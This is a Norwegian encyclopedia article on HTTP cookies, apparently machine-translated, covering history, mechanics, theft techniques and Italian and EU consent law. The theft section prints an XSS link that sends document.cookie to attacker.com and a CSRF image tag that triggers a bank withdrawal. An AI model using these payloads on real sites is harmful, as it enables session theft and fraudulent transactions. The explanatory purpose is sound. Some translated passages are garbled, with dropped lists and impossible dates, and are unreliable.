Informasjonskapsler

HTTP-informasjonskapsler ( pron. / ˈKuki / ; mer presist kalt web-informasjonskapsler , eller cookies par excellence ) [1] er en spesiell type magisk informasjonskapsel (en slags identifikasjonstoken) og brukes av nettapplikasjonerserversiden for å lagre og hente langsiktig informasjon på klientsiden .

Historie

Konseptet og begrepet informasjonskapsel , som bokstavelig talt betyr "informasjonskapsel", stammer fra den magiske informasjonskapselen (magisk informasjonskapsel) en teknikk kjent i UNIX -miljøet så tidlig som på 1980-tallet og vanligvis brukt til å implementere identifikasjonsmekanismer for en klient på en server , som f.eks. som eksempel X Window System- .

Den første bruken av HTTP -informasjonskapsler dateres tilbake til 1994, da de ble brukt til å sjekke om leserne av Netscape -nettstedet allerede hadde besøkt det før. I 1995 ble håndteringen av informasjonskapsler integrert i Internet Explorer 2. Innføringen av informasjonskapsler var i utgangspunktet ikke kjent av et bredt publikum, men det ble startet etter en artikkel publisert i Financial Times 12. februar 1996 [2] . Debatten som fulgte hadde som tema implikasjonene av informasjonskapsler på hemmelighold. Informasjonskapsler var gjenstand for to amerikanske Federal Commerce Commission-høringer i 1996 og 1997. Fra disse datoene begynte bruken av informasjonskapsler å bli regulert.

I dag gjelder de vanligste applikasjonene lagring av informasjon om brukerens vaner på nettsidene de besøker. Disse applikasjonene har ofte reist tvil fra surfernes personvernforsvarere , faktisk kan en informasjonskapsel hjelpe oss med navigering eller spionere på oss. Dette andre tilfellet inkluderer mange annonsekjeder (som selger reklame til mange forskjellige nettsteder) som bruker en informasjonskapsel knyttet til reklamebildet for å korrelere besøkene til samme bruker til flere forskjellige nettsteder, og dermed bygge en slags profil av de mest forskjellige nettstedene. verdsatt. Annen bruk som anses som praktisk fordi de bruker informasjonskapselen som en tjeneste for brukeren, er for eksempel opptak av data fra en økt for å unngå behovet for en ny autentisering ved et påfølgende besøk (det samme gjør Wikipedia for sine registrerte brukere), eller å holde innholdet i "handlekurven" på e- handelssider .

Beskrivelse

Generell informasjon

Serverne sender informasjonskapsler i HTTP -svaret til klienten og nettlesere forventes å lagre og sende informasjonskapsler til serveren hver gang flere forespørsler sendes til webserveren .

Denne gjenkjenningen tillater opprettelse av autentiseringsmekanismer som brukes for eksempel for pålogginger ; å huske data som er nyttige for nettlesingsøkten , for eksempel preferanser for det grafiske eller språklige aspektet av nettstedet ; å spore brukerens navigasjon, for eksempel for statistiske eller reklameformål; å knytte til data lagret av serveren, for eksempel innholdet i handlekurven til en elektronisk butikk .

Gitt implikasjonene for personvernet til nettsurfere, er bruken av informasjonskapsler kategorisert og regulert i rettssystemene i en rekke land, inkludert europeiske, inkludert Italia. Sikkerheten til en autentiseringsinformasjonskapsel avhenger generelt av sikkerheten til nettstedet som utsteder den, på brukerens nettleser, og avhenger av om informasjonskapselen er kryptert eller ikke. Sikkerhetssårbarheter kan tillate hackere å lese informasjonskapseldata , som kan brukes til å få tilgang til brukerdata, eller for å få tilgang (med brukerlegitimasjon) til nettstedet som informasjonskapselen tilhører (se skriptingtvers av nettsteder og forfalskning av forespørsler på tvers av nettsteder for eksempel). [3]

Informasjonskapsler , og spesielt tredjeparts informasjonskapsler , brukes ofte til å lagre brukersøk; disse sensitive dataene kan være en potensiell trussel mot brukernes personvern; nettopp dette førte til at europeiske [4] og amerikanske myndigheter regulerte bruken gjennom en lov i 2011 [5] . Faktisk krever europeisk lovgivning at alle medlemslandssider informerer brukerne om at nettstedet bruker visse typer informasjonskapsler .

Funksjoner

I praktiske og ikke-spesialiserte termer ligner en informasjonskapsel på en liten fil, lagret på datamaskinen av nettsteder under navigering, nyttig for å lagre preferanser og forbedre ytelsen til nettsteder. Dette optimerer brukerens nettleseropplevelse.

I detalj er en informasjonskapsel en liten tekststreng som sendes av en nettserver til en nettklient (vanligvis en nettleser ) og deretter sendes tilbake av klienten til serveren (uten å bli endret) hver gang klienten får tilgang til den samme delen. samme webdomene . Informasjonskapsler ble opprinnelig introdusert for å gi brukere en måte å lagre varene de ønsket å kjøpe mens de surfer på nettstedet (den såkalte "handlekurven").

I dag lagres imidlertid innholdet i en brukers handlekurv i en database på serveren, i stedet for i en informasjonskapsel på klienten. For å spore hvilken bruker som er tildelt handlekurven, sender webserveren en informasjonskapsel til klienten som inneholder en unik øktidentifikator (vanligvis en lang rekke bokstaver og tall). Siden informasjonskapsler sendes til serveren ved hver klientforespørsel, vil sesjonsidentifikatoren bli sendt til serveren hver gang brukeren besøker en side på nettstedet, dette lar serveren vite hvilken handlevogn som skal gis til brukeren.

Siden øktinformasjonskapsler bare inneholder en unik øktidentifikator, gjør dette mengden personlig informasjon et nettsted kan lagre tilnærmet ubegrenset. Nettstedet er ikke begrenset til restriksjoner på hvor lang tekststrengen som utgjør en informasjonskapsel kan være. Øktinformasjonskapsler kan også bidra til å forbedre sideinnlastingstider, siden informasjonsmengden i en øktinformasjonskapsel er liten og krever liten båndbredde.

Hovedinformasjonskapselen, den som brukes til å huske alternativene for alle de andre informasjonskapslene, kalles en teknisk informasjonskapsel (samtykke) eller den som styrer sending og mottak av informasjonspakken (markører).

Hvert domene eller del av det som besøkes med nettleseren kan sette informasjonskapsler. Siden en typisk Internett -side , for eksempel en nettavis, inneholder objekter som kommer fra mange forskjellige domener og hver av dem kan sette informasjonskapsler, er det normalt å være vert for mange hundre informasjonskapsler i nettleseren din.

Informasjonskapsler blir ofte feilaktig ansett for å være ekte programmer, og dette genererer feilaktige oppfatninger. I virkeligheten er de enkle datablokker som ikke er i stand til å utføre noen handling på datamaskinen alene . Spesielt kan de ikke være spionprogrammer eller virus . Ikke desto mindre blir informasjonskapsler fra enkelte nettsteder kategorisert som spionprogrammer av mange anti-spyware-produkter fordi de gjør det mulig for brukeren å bli identifisert. Moderne nettlesere lar brukere bestemme om de vil akseptere informasjonskapsler eller ikke, men ethvert avslag gjør enkelte objekter ubrukelige. For eksempel fungerer ikke handlekurver implementert med informasjonskapsler ved avslag.

Informasjonskapsler brukes ikke bare på PCer eller lignende, men også på smarttelefoner , nettbrett og smart-TVer .

Operasjon

En informasjonskapsel er en ekstra overskrift til stede i en HTTP - forespørsel ( Cookie:) eller svar ( Set-cookie :) : hvis serveren ønsker å tilordne en informasjonskapsel til brukeren, vil den legge den til svarhodene. Klienten må legge merke til tilstedeværelsen av informasjonskapselen og lagre den i et spesifikt område (vanligvis brukes en katalog der hver informasjonskapsel er lagret i en fil ). Informasjonskapselen består av en vilkårlig tekststreng, en utløpsdato (utover denne må den ikke anses som gyldig) og et mønster for å gjenkjenne domenene den skal sendes tilbake til. Flere informasjonskapsler kan settes i ett enkelt HTTP-svar.

Klientens nettleser vil returnere informasjonskapselen, uten noen endring, ved å legge den til alle HTTP-forespørsler som tilfredsstiller mønsteret, innen utløpsdatoen. Serveren kan deretter velge å tilordne informasjonskapselen på nytt, og overskrive den gamle. Gjeninnsending av mønster lar alle underdomener til et gitt domene motta informasjonskapselen, hvis ønskelig.

Informasjonskapsler brukes til å legge til en tilstand til en statsløs protokoll. Uten informasjonskapsler ville det ikke vært noen forskjell på en side som ble lastet inn før pålogging , fra den samme siden som ble lastet inn etterpå. Siden informasjonskapsler forblir i systemet i lange perioder, kan nettsteder tilordne en indeks til brukeren og holde oversikt over deres navigering på nettstedet, vanligvis med det formål å lage statistikk. De kan også brukes til å spore navigasjon på tredjeparts nettsteder, hvis disse tredjeparts nettsteder bruker innhold fra nettstedet som har satt informasjonskapselen. Annonsering på nettsteder håndteres vanligvis av selskaper som har annonser på ulike nettsider.

Innholdet i selve annonsen lastes direkte fra deres server (via en HTTP-forespørsel) og vises på en integrert måte på nettstedet som brukeren ønsker å besøke. På denne måten vil serveren til annonseselskapet motta adressen til siden som vises fra brukerens nettleser, og vil kunne sende en informasjonskapsel til klienten. Gjennom denne mekanismen kan reklameselskaper samle informasjon om brukere og bygge profiler og vise dem målrettede annonser.

Bruk

Siden de kan brukes til å overvåke nettsurfing , er informasjonskapsler gjenstand for diskusjoner om retten til personvern . Mange land og organisasjoner, inkludert USA og EU , har lovfestet dette. Informasjonskapsler har også blitt kritisert fordi de ikke alltid er i stand til å identifisere brukeren nøyaktig og også fordi de potensielt kan bli utsatt for cyberangrep . Det finnes noen alternativer til informasjonskapsler, men alle sammen med noen fordeler har kontraindikasjoner.

I retningslinjene for informasjonskapsler må administratorer av et nettsted spesifisere i detalj retningslinjene for egne eller tredjeparters informasjonskapsler .

Aktivitetene de brukes til er autentisering , sesjonssporing og lagring av spesifikk informasjon om brukere som har tilgang til serveren , for eksempel favorittnettsteder eller, i tilfelle kjøp via internett , innholdet i deres "handlekurver".

Googles søkemotor sender også en informasjonskapsel som lagrer data om søk, søkeord og brukervaner .

Mer spesifikt er de forskjellige bruken av informasjonskapsler derfor:

Mange moderne nettlesere lar brukeren bestemme når de skal godta informasjonskapsler, men å avvise noen informasjonskapsler tillater ikke bruk av enkelte nettsteder (la oss ta som eksempel registreringen til et nettsted som Wikipedia).

Innstillingene kan tilpasses for å aktivere eller blokkere dem alltid, innen en viss oppholdsperiode, for å filtrere nettsteder basert på hvitelister og svartelister , og for å filtrere informasjonskapsler som brukes av samme server eller også ved lenker (ofte reklame) til nettsteder som ligger på forskjellige servere.

Det skal bemerkes at funksjonen til informasjonskapsler er helt avhengig av navigasjonsnettleseren som brukeren bruker: i teorien kan dette programmet gi brukeren full kontroll over informasjonskapsler og tillate eller nekte opprettelse og spredning av dem. Internet Explorer har kun en rudimentær håndtering av informasjonskapsler, mens alternativer som Opera eller Mozilla Firefox gir brukeren større kontroll og lar deg godta/avvise informasjonskapsler fra bestemte nettsteder. Andre programmer, som skal brukes som proxyer , gir også brukeren større grad av kontroll over hva som skjer.

En Tor eller proxy-server har den ultimate effekten, ikke å slette IP-adressen, men å få den til å se annerledes ut enn datamaskinen din. Ved gjenkjenning av IP-adressen, med disse tiltakene, er det ingen begrensning i antall navigerbare nettsteder.

Struktur

Elementer

I motsetning til hva mange tror, ​​er en informasjonskapsel ikke en liten tekstfil: den kan lagres i en tekstfil, men ikke nødvendigvis. I informasjonskapselen kan vi vanligvis finne fire attributter:

Domene og sti

Domenet (domenet) og banen (banen), definerer omfanget av synligheten til informasjonskapselen, indikerer til nettleseren at informasjonskapselen kan sendes til serveren kun for det angitte domenet og banen. Hvis det ikke er spesifisert, tar de som standard verdien av domenet og banen som opprinnelig ba om dem. Et eksempel på et direktiv for opprettelse av informasjonskapsler av et nettsted etter pålogging av en bruker er følgende:

Set-Cookie: LSID=DQAAAK…Eaem_vYg; Domain=docs.foo.com; Path=/accounts; Expires=Wed, 13-Jan-20021 22:23:01 GMT; Secure; HttpOnly
Set-Cookie: HSID=AYQEVn….DKrdst; Domain=.foo.com; Path=/; Expires=Wed, 13-Jan-20021 22:23:01 GMT; HttpOnly
Set-Cookie: SSID=Ap4P….GTEq; Domain=.foo.com; Path=/; Expires=Wed, 13-Jan-20021 22:23:01 GMT; Secure; HttpOnly
 ......

Den første informasjonskapselen LSIDhar et standard domene docs.foo.comog en bane /accounts, som vil instruere nettleseren til å bruke informasjonskapselen kun når den forespurte siden inneholder docs.foo.com/accounts. De andre 2 informasjonskapslene HSIDog SSIDkan sendes fra nettleseren til serveren når de besøkes, hvilket som helst av underdomenene .foo.commed hvilken som helst bane, for eksempel www.foo.com/. Informasjonskapsler kan bare settes av hoveddomener og deres underdomener.

Typer informasjonskapsler

Det store utvalget av informasjonskapsler i nettets verden gjør det vanskelig å klassifisere dem. Det er imidlertid mulig å utarbeide en generell taksonomi ved å dele dem inn i ulike kategorier. [6] Hovedattributtet som vi kan dele informasjonskapsler med er livssyklusen deres , som lar oss skille dem i:

Det er da mulig å klassifisere informasjonskapsler basert på deres opprinnelse i:

Til slutt er det mulig å skille dem fra brukssynspunktet ( eller formålet ) i:

Andre nyttige typer informasjonskapsler:

Manipulasjoner på informasjonskapsler

En prosedyre for manipulering av informasjonskapsler er informasjonskapselforgiftning . Den består i å endre innholdet i en informasjonskapsel (for eksempel den personlige informasjonen som er lagret på brukerens datamaskin) for å omgå sikkerhetsmekanismene . Gjennom denne teknikken kan angripere få privat og uautorisert informasjon fra en bruker, samt stjele deres digitale identitet . Informasjonskapslene som er lagret på brukerens datamaskin inneholder informasjon som lar applikasjoner autentisere bruker-ID, overvåke brukeratferd og tilpasse innholdet på et nettsted. Vanligvis er disse dataene utsatt for kryptering , men algoritmene er ikke alltid trygge, så noen brukere med ondsinnede hensikter kan stjele dataene våre og bruke eller endre dem. I følge organisasjonen The Open Web Application Security Project, ofte kjent som OWASP , er manipulering av informasjonskapsler et av de 20 mest brukte angrepene fra hackere, spesielt i e - handelssystemer , og brukes til å identifisere brukeren.

De fleste nettsteder bruker informasjonskapsler som unike identifikatorer for brukerøkter, ettersom andre identifiseringsmetoder har begrensninger og sårbarheter. Det er imidlertid en risiko, faktisk kan det tillate angripere å stjele og etterligne brukerforespørsler. Fra webserverens synspunkt har en forespørsel fra en bruker med ondsinnet hensikt (dvs. en bruker som har stjålet informasjonskapslene til andre brukere) ingen forskjell fra forespørselen fra offeret.

Her er flere teknikker for tyveri av informasjonskapsler som bare fungerer med nettsteder som er avhengige av HTTP-informasjonskapsler for å autentisere brukere.

Nettverksavlytting

Trafikken til et nettverk kan fanges opp og leses av en datamaskin som er koblet til et annet nettverk enn avsenderen og mottakeren (spesielt når den er koblet til et ukryptert Wi-Fi- nettverk). Denne trafikken inkluderer informasjonskapsler som sendes over ukrypterte HTTP-økter, og kan tillate angripere å lese kommunikasjon fra andre nettverksbrukere, inkludert HTTP -informasjonskapsler , så vel som hele innholdet i samtaler, med det formål å utføre en mann-i-angrepet .

En angriper kan bruke avskjærte informasjonskapsler for å etterligne brukeren som eier informasjonskapslene, og utføre ondsinnede operasjoner, for eksempel å overføre pengesummer fra offerets bankkonto til andre kontoer, ofte usporbare.

Dette problemet kan løses gjennom en kryptert kommunikasjon, mellom brukerens datamaskin og webserveren, ved hjelp av Transport Layer Security ( HTTPS -protokoll ). Serveren kan spesifisere Secure-flagget når du setter informasjonskapsler, slik at nettleseren kun kan sende informasjonskapsler over en kryptert kanal, for eksempel en SSL -tilkobling .

Falske underdomener og DNS-bufferforgiftning

Hvis en angriper er i stand til å skjule en DNS-server , og få brukeren til å bruke en dummy/falske DNS-server ( DNS-cache-forgiftning ), kan dette tillate angriperen å få tilgang til brukerens informasjonskapsler. En angriper kan for eksempel bruke DNS-bufferforgiftning for å lage en falsk DNS f12345.www.example.comsom faktisk peker til angriperens server- IP-adresse . Sistnevnte kan deretter legge inn URL-bildet til serveren sin (for eksempel http://f12345.www.example.com/img_4_cookie.jpg),. Ofre som leser angriperens melding vil gå til å laste ned dette bildet fra f12345.www.example.com. Siden det f12345.www.example.comer et underdomene til www.example.com, vil ofrenes nettleser sende all informasjonskapselen example.comtil angriperens server.

Hvis en angriper er i stand til å oppnå dette, er det vanligvis feilen til Internett-leverandører (ISP) som ikke har garantert en sikker tilkobling av DNS-serverne. Alvorlighetsgraden av dette angrepet kan imidlertid reduseres hvis mottakernettstedet bruker sikre informasjonskapsler. I dette tilfellet vil angriperen ha en ekstra hindring, nemlig å få SSL -sertifikatet til målnettstedet fra en sertifiseringsmyndighet , siden sikre informasjonskapsler bare kan overføres via en kryptert tilkobling. Uten et SSL-sertifikat ville ofrenes nettlesere ha vist en advarsel om angriperens nettsteds ugyldige sertifikat, noe som kan hjelpe brukere til å ikke besøke det, og dermed unngå å sende informasjonskapsler til et usikkert nettsted.

Skripting på tvers av nettsteder: tyveri av informasjonskapsler

Informasjonskapsler kan også stjeles ved å bruke en teknikk som kalles cross-site scripting . Dette skjer når en angriper utnytter et nettsted som lar brukere sende ufiltrert HTML- og JavaScript-innhold. Ved å sende skadelig HTML- og JavaScript-innhold kan angriperen bruke offerets nettleser til å ta kontroll over informasjonskapslene deres.

Som et eksempel kan en angriper sende en melding på www.example.commed følgende lenke:

< a href = "#" onclick = "window.location = 'http: //attacker.com/stole.cgi? text =' + escape (document.cookie); return false;" > Klikk her! </ a >

Når en annen bruker klikker på denne lenken, kjører nettleseren et stykke kode innenfor attributtet onclick, og erstatter dermed strengen document.cookiemed listen over informasjonskapsler som er tilgjengelige fra gjeldende side. Som et resultat sendes denne listen over informasjonskapsler til serveren attacker.com. Hvis tilkoblingen gjøres via HTTPS https://www.example.com , vil de sikre informasjonskapslene sendes det samme til attacker.comi tekstformat.

Det er nettstedutviklernes ansvar å filtrere bort slik ondsinnet kode.

Slike angrep kan reduseres ved å bruke HttpOnly informasjonskapsler . Disse informasjonskapslene vil ikke være tilgjengelige på klientsiden gjennom skriptspråk som JavaScript, og angriperen vil derfor ikke kunne stjele disse informasjonskapslene.

Skripting på tvers av nettsteder: proxy-forespørsel

I eldre versjoner av mange nettlesere var det sikkerhetshull som tillot angripere å forsøple skriptene til en proxy-forespørsel på klientsiden via XMLHttpRequest API. For eksempel leser offeret en angripers innlegg på www.example.com, og angriperens skript kjører i offerets nettleser. Skriptet genererer en forespørsel om www.example.comcon attacker.comsom en proxy-server. Siden forespørselen er for www.example.com, vil alle informasjonskapsler example.combli sendt sammen med forespørselen, men de vil bli rutet gjennom angriperens proxy-server. Derfor ville angriperen være i stand til å avskjære offerets informasjonskapsler.

Dette angrepet ville ikke ha fungert med sikre informasjonskapsler, ettersom de kun kan overføres over HTTPS -tilkoblinger , og HTTPS-protokollen implementerer ende-til-ende-kryptering (dvs. informasjon er kryptert i brukerens nettleser og dekryptert på serveren. destinasjon). I dette tilfellet vil proxy-serveren bare se de første krypterte bytene til HTTP-forespørselen.

Forfalskning av forespørsel på tvers av nettsteder

Bob kan for eksempel surfe på et forum der en annen bruker, Mallory, la ut en melding. Anta at Mallory laget et HTML-bilde som refererer til en operasjon på Bobs banknettsted (i stedet for en bildefil) for eksempel:

<img src = "http://bank.example.com/withdraw?account=bob&amount=1000000&for=mallory" >

Hvis Bobs bank beholder autentiseringsinformasjonen hans i en informasjonskapsel, og hvis informasjonskapselen ikke har utløpt, vil Bobs nettleserforsøk på å laste inn bildet presentere hans informasjonskapselfrafallsskjema, og dermed godkjenne en transaksjon uten Bobs godkjenning.

Eliminering

Når du har satt nettleseren din til å akseptere informasjonskapsler, lagres de i en spesiell systemmappe, vanligvis i brukerens bane. Banen der de tilsvarende filene lagres fysisk avhenger av kombinasjonen av enhetstype/operativsystem/nettleser [11] . Du kan enkelt slette dem enten ved å handle på kommandoene gitt av nettleseren (de samme som lar deg slette historikk, cache , påloggingsinformasjon , skjemautfyllingsdata osv.) eller ved å bruke en av de mange tredjeparts " rengjøringsmidler", som CCleaner , Spybot-Search & Destroy . I tillegg til den massive elimineringen, er det mulig å bruke individuelle filer, men da er det nødvendig å gjenkjenne dem ved å handle (i den relative mappen) på de spesifikke informasjonskapslene av interesse.

Når informasjonskapslene er slettet, er det normalt at nettleseren og de ulike nettstedene dukker opp igjen med henholdsvis forespørsler om tilpasning, innstilling og aksept av informasjonskapsler eller surfing på vanlige nettsteder er litt og i utgangspunktet litt tregere: dette skyldes faktisk , til den utførte rengjøringen.

Juridiske aspekter

Italiensk lovgivning

I Italia er referansestandarden for informasjonskapsler art. 122 [12] i personvernkoden som i sin utforming i slutten av mai 2012 implementerer fellesskapsdirektivet 2009/136 / EC [13] E-Privacy. Det er derfor nødvendig at brukeren, bortsett fra i spesielle tilfeller, er informert og gir uttrykkelig samtykke, før informasjonskapslene lagres. Selv om denne indikasjonen var rettet mot å gi større garantier til brukerne, skapte den den gang et varsel hos operatørene om risikoen for at det kunne kompromittere navigasjonsmetodene slik vi kjenner dem i dag [14] .

2. juni 2015 ble det obligatorisk for nettstedadministratorer å overholde bestemmelsen "Identifisering av forenklede prosedyrer for informasjon og innhenting av samtykke for bruk av informasjonskapsler" (Offisiell tidsskrift nr. 126 av 3. juni 2014) av 8. mai, 2014 [15] , med hvilken garantisten for beskyttelse av personopplysninger dikterer reglene for hvordan man skal oppfylle forpliktelsene til å utstede informasjonen og innhente samtykke fra brukere ved bruk av informasjonskapsler. For alle nettsteder som bruker ikke-tekniske (profilerings-) informasjonskapsler, fastslår bestemmelsen at når du går inn på en hvilken som helst side på nettstedet, må et banner [16] (som inneholder den korte informasjonen) umiddelbart vises i forgrunnen [16] (som inneholder oversikten) informasjon). passende dimensjoner, med egenskaper som for å bestemme en diskontinuitet i nettleseropplevelsen, som indikerer:

  1. Bruken av profileringsinformasjonskapsler for å sende reklamemeldinger i tråd med preferansene uttrykt av brukeren mens han surfer på nettet;
  2. hvis nettstedet tillater sending av "tredjeparts" informasjonskapsler;
  3. lenken til den utvidede informasjonen;
  4. muligheten for å nekte samtykke til installasjon av informasjonskapsler;
  5. at fortsettelsen av navigasjonen innebærer at det gis samtykke til bruk av informasjonskapsler.

En teknisk informasjonskapsel må da kobles til det korte informasjonsbanneret som gjør det mulig å holde oversikt over brukerens samtykke for senere navigering på samme nettside.

Gjennom informasjonsbanneret, og gjennom referansene nederst på hver side på siden, må brukeren derfor kunne få tilgang til den utvidede informasjonen (den såkalte cookie-policyen ) som skal inneholde alle elementene som art. 13 i koden [17] , beskriver på en spesifikk og analytisk måte egenskapene og formålene til informasjonskapslene som er installert av nettstedet, lar brukeren velge eller velge bort individuelle informasjonskapsler, inneholder oppdaterte lenker til informasjonen og samtykkeskjemaene til tredjeparter med som utgiveren har inngått avtaler om installasjon av informasjonskapsler gjennom sin side. Hvis utgiveren har indirekte kontakter med tredjeparter, må han legge inn lenkene til nettstedene som fungerer som mellomledd mellom ham og de samme tredjepartene.

Til slutt må informasjonen huske på muligheten for brukeren til å uttrykke sine valg angående bruken av informasjonskapsler på nettstedet også gjennom nettleserinnstillingene, som i det minste indikerer prosedyren som skal utføres for å konfigurere disse innstillingene.

Ved utelatt eller uegnet informasjon, samt i bestemmelsene i art. 13 i koden, gir bestemmelsen en administrativ sanksjon for betaling av et beløp fra seks tusen til trettiseks tusen euro (artikkel 161 i koden).

Installasjon av informasjonskapsler på brukernes terminaler i mangel av deres forhåndssamtykke innebærer på den annen side straffen for betaling av en sum som varierer fra ti tusen til hundre og tjue tusen euro (artikkel 162, paragraf 2-bis, av koden) [18] .

Den utelatte eller ufullstendige varslingen til garantisten fra subjekter som bruker "profileringsinformasjonskapsler" innebærer en straff på mellom tjue tusen og ett hundre og tjue tusen euro (artikkel 163 i koden). Unntatt fra denne forpliktelsen er de som ikke direkte bruker "profileringsinformasjonskapsler":

  • nettsteder som overfører "tredjeparts" "profilering" informasjonskapsler;
  • nettsteder som direkte bruker tekniske informasjonskapsler.

Kausjonisten ga, med hensyn til de tilfeller det er nødvendig med varsel, ytterligere presiseringer i webdokumentnr. 993385 . Når det gjelder de forespurte avklaringene om anvendelsesområdet for lovgivningen om informasjonskapsler [19] , skal det bemerkes at det samme gjelder alle nettsteder som, uavhengig av tilstedeværelsen av et kontor i staten, installerer informasjonskapsler på brukernes terminaler, bruker derfor for behandlingen "instrumenter plassert på statens territorium" (se art. 5, paragraf 2, i personvernkoden [20] ).

Fra 25. mai 2018 er forskriften om informasjonskapsler foreskrevet av GDPR (se avsnitt).

Fra 9. januar 2022 i Italia er en ny resept på informasjonskapsler i kraft (utstedt i juli 2021 av garantisten [21] ): kravene som webansvarlig for et nettsted må overholde sikrer brukeren større rettigheter og retten til å ta informerte valg (mellom de andre: mulighet for å blokkere alle kategorier av informasjonskapsler, bortsett fra den tekniske, og beholde brukerens valg).

Den nye europeiske lovgivningen: GDPR

Den generelle databeskyttelsesforordningen (GDPR, General Data Protection Regulation - EU Regulation 2016/679) har vært brukt siden 25. mai 2018 . GDPR erstatter gjeldende italiensk lov om databeskyttelse (offisielt direktiv 95/46 / EC) [22] og opphever reglene i koden for beskyttelse av personopplysninger (lovgivningsdekret nr. 196/2003) som vil være uforenlige med den . Derfor forblir artiklene i den italienske koden som ikke spesifikt dekkes av GDPR i kraft (med mindre fremtidige lovbestemmelser).

I følge EU-kommisjonen "er personopplysninger all informasjon knyttet til en person, knyttet til hans private, profesjonelle eller offentlige liv. Det kan gjelde alle personlige data: navn, bilder, e-postadresser, bankdetaljer, intervensjoner på sosiale medier nettsteder. nettverk , medisinsk informasjon eller datamaskinens IP-adresser ." [23]

Av denne grunn må informasjonskapsler også behandles som personopplysninger og skal administreres som følger:

  • Personopplysninger kan ikke spores eller brukes før brukeren har gitt uttrykkelig samtykke;
  • All sporing av personlige data på alle sider / URL-er til det involverte nettstedet må spesifiseres;
  • Brukere av nettstedet må informeres på et klart språk om:
    • Hvem mottar dataene deres og hvordan de brukes;
    • Utløpsdatoen for informasjonskapslene;
  • Hver autorisasjon må lagres/registreres for å bevise overfor myndighetene at den er gitt ( bevisformat );
  • Tilbaketrekking av samtykke skal være enkelt å gjøre, også på et senere tidspunkt. [24] [25]

Videre må policyen for informasjonskapsler inneholde listen over alle informasjonskapslene som finnes på alle sidene på nettstedet og for hver av dem: hvem som mottar dataene, hva de brukes til og utløpsdatoen.

I januar 2017 foreslo EU-kommisjonen et alternativ [26] med sikte på å forenkle nettopplevelsen, i håp om at nettleserne selv kan administrere brukerpreferanser for samtykke/avvisning av informasjonskapsler – og dermed eliminere behovet for å administrere individuell aksept av informasjonskapsler på individuelle nettsteder. Dette forslaget ble ikke fulgt opp og ble sterkt kritisert og vurdert som ikke gjennomførbart. [27] [28]

Teknisk sett kan ikke nettlesere lese formålet med en informasjonskapsel (hvordan den brukes) og kan ikke gi en beskrivelse av den på "vanlig språk" som kreves av GDPR. Videre kan ikke nettlesere registrere alle informasjonskapslene som finnes på et helt nettsted, men bare én om gangen for en enkelt side. Nettlesere kan ikke administrere forskjellige samtykker basert på forskjellige nettsteder (så det vil være en aksept av alle eller ingen av informasjonskapslene) og kan heller ikke gi testformatet (lagre samtykker) som kreves av GDPR . I lys av ingen ny utvikling av dette forslaget fra EU-kommisjonen , vil nettstedoperatører måtte overholde kravene i GDPR.

Hvilke endringer sammenlignet med gjeldende lovgivning

Når det gjelder et nettsted med kun tekniske/funksjonelle informasjonskapsler (handlekurv, språkvalg, preferanser) eller førsteparts statistiske informasjonskapsler (f.eks. Matomo og lignende): alt forblir som det er nå, og derfor er det ikke det . nødvendig å ha et informasjonskapselbanner, forebyggende blokkering av informasjonskapsler før samtykke og lagring av samtykke ( testformat) .

Denne saken inkluderer også tredjeparts statistiske informasjonskapsler som Google Analytics med anonymisert IP slik at IP-adressen ikke kan rekonstrueres med " reverse engineering "-teknikker. Ved å bruke Google Analytics må du derfor deaktivere datadeling med andre Google-produkter/-tjenester [29] , ellers faller det inn i neste sak.

I tilfelle av tilstedeværelsen av andre typer informasjonskapsler, og derfor annonserings (Google Adsense, DoubleClick, retargeting, etc.) og alle andre tredjeparts informasjonskapsler (sosiale nettverk, YouTube, etc.) i tillegg til informasjonskapselbanneret, GDPR krever:

  • eksplisitt samtykke ( opt-in ) og derfor ikke lenger implisitt som å "rulle" siden;
  • forebyggende blokkering av informasjonskapsler før samtykke;
  • registrering av samtykkelogger som skal leveres som "bevis";
  • beskrivelsen for hver informasjonskapsel som inkluderer hvem som mottar dataene, for hvilket formål og utløpsdatoen;
  • muligheten til å trekke tilbake samtykke på en enkel måte også på et senere tidspunkt.

Lignende teknologier

  • I en verden av nettlagring er det også DOM-lagring [30] [31] som er en type avansert innhold som har funksjoner som ligner på informasjonskapsler. I praksis er det en artikulert og kompleks informasjonskapsel. Hvert operativsystem, gjennom nettleseren, lagrer informasjonen som er lagret av de besøkte nettstedene som mater DOM-lagringen (også kalt Web Storage ) [32] som kan deaktiveres og/eller slettes akkurat som informasjonskapsler. I tillegg til informasjonskapsler har nettlesere muligheten til å aktivere eller deaktivere arkivering av dom-lagringen til nettsteder som krever det [33] .

Merknader

  1. ^ Cookie betyr vanligvis "kjeks" på engelsk, spesielt er det en smørkjeks med sjokoladebiter som er typisk for amerikansk kultur, men begrepet brukes i dette tilfellet for å referere til kjeks for kjæledyr, og mer generelt med betydningen av "liten premie". ".
  2. ^ Tim Jackson, Denne feilen i PC-en din er en smart informasjonskapsel , i Financial Times , 12. februar 1996 - # 12.
  3. ^ Gmail-informasjonskapsel stjålet via Google Spreadsheets , på CNET . Hentet 12. mai 2016 .
  4. ^ Hva med "EU-direktivet om informasjonskapsler"nettskanner for informasjonskapsler . Hentet 12. mai 2016 .
  5. ^ Nye nettregler satt for å få informasjonskapsler til å smuldre , på BBC News . Hentet 12. mai 2016 .
  6. ^ ( NO ) Informasjonskapsler og personvern , på europarl.europa.eu .
  7. ^ Økter og sikkerhet , på php.net . Hentet 28. mai 2016 (arkivert fra originalen 29. januar 2016) .
  8. ^ http://www.youronlinechoices.com/it/a-proposito
  9. ^ «SameSite»-informasjonskapselattributt - Chrome Platform Status , på chromestatus.com . Hentet 7. mai 2016 .
  10. ^ Lær mer om den offentlige suffikslisten på publicsuffix.org . Hentet 24. mai 2016 .
  11. ^ På nettet kan du enkelt finne sider som angir lagringsbanene til informasjonskapsler for hvert enkelt tilfelle.
  12. ^ http://www.normattiva.it/atto/caricaArticolo?art.progressivo=0&art.idArticolo=122&art.versione=2&art.codiceRedazionale=003G0218&art.dataPubblicaGazzetta=2003-07-29&atto.timentoVOid=LEVoGRETI=2003-07-29&atto.timento2VoVoid=LEVoVoid=LEVoCvediment%2VoVoid=VoVoD .idSottoArticolo1 = 10 & art.idSottoArticolo = 1 & art.flagTipoArticolo = 0 # art
  13. ^ Direktiv 2009-136-CE - Personverngaranti , på garanteprivacy.it . Hentet 10. januar 2016 .
  14. ^ Personvernsikre informasjonskapsler: endringene introdusert av lovdekret 69/12 (1. del) | CINDI
  15. ^ Identifikasjon av de forenklede prosedyrene for informasjonen og ... - Personverngarantien , på garanteprivacy.it . Hentet 10. januar 2016 (Arkiveret fra originalen 10. januar 2016) .
